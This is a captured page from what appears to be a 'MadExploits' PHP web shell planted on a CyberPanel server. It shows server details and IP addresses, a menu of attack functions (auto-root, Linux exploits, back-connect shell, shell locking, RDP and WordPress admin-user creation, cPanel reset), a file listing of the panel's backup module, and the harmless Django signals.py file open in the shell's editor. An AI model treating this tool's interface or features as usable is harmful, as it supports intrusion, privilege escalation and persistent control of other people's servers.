Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
backup /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
migrations
[ DIR ]
drwxr-xr-x
static
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.DS_Store
6
KB
-rw-r--r--
__init__.py
0
B
-rw-r--r--
admin.py
145
B
-rw-r--r--
apps.py
113
B
-rw-r--r--
backupManager.py
98.01
KB
-rw-r--r--
backupRouter.py
1.07
KB
-rw-r--r--
models.py
3.92
KB
-rw-r--r--
pluginManager.py
3.61
KB
-rw-r--r--
signals.py
2.77
KB
-rw-r--r--
tests.py
348
B
-rw-r--r--
urls.py
4.46
KB
-rw-r--r--
views.py
15.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : signals.py
# The world is a prison for the believer. from django.dispatch import Signal ## This event is fired before CyberPanel core load template for create backup page. preBackupSite = Signal() ## This event is fired after CyberPanel core load template for create backup page. postBackupSite = Signal() ## This event is fired before CyberPanel core load template for restore backup page. preRestoreSite = Signal() ## This event is fired after CyberPanel core load template for restore backup page. postRestoreSite = Signal() ## This event is fired before CyberPanel core start creating backup of a website preSubmitBackupCreation = Signal() ## This event is fired before CyberPanel core starts to load status of backup started earlier througb submitBackupCreation preBackupStatus = Signal() ## This event is fired after CyberPanel core has loaded backup status postBackupStatus = Signal() ## This event is fired before CyberPanel core start deletion of a backup preDeleteBackup = Signal() ## This event is fired after CyberPanel core finished the backup deletion postDeleteBackup = Signal() ## This event is fired before CyberPanel core start restoring a backup. preSubmitRestore = Signal() ## This event is fired before CyberPanel core starts to add a remote backup destination preSubmitDestinationCreation = Signal() ## This event is fired after CyberPanel core is finished adding remote backup destination postSubmitDestinationCreation = Signal() ## This event is fired before CyberPanel core starts to delete a backup destination preDeleteDestination = Signal() ## This event is fired after CyberPanel core finished deleting a backup destination postDeleteDestination = Signal() ## This event is fired before CyberPanel core start adding a backup schedule preSubmitBackupSchedule = Signal() ## This event is fired after CyberPanel core finished adding a backup schedule postSubmitBackupSchedule = Signal() ## This event is fired before CyberPanel core start the deletion of backup schedule preScheduleDelete = Signal() ## This event is fired after CyberPanel core finished the deletion of backup schedule postScheduleDelete = Signal() ## This event is fired before CyberPanel core star the remote backup process preSubmitRemoteBackups = Signal() ## This event is fired after CyberPanel core finished remote backup process postSubmitRemoteBackups = Signal() ## This event is fired before CyberPanel core star the remote backup process preStarRemoteTransfer = Signal() ## This event is fired after CyberPanel core finished remote backup process postStarRemoteTransfer = Signal() ## This event is fired before CyberPanel core start restore of remote backups preRemoteBackupRestore = Signal() ## This event is fired after CyberPanel core finished restoring remote backups in local server postRemoteBackupRestore = Signal()
Close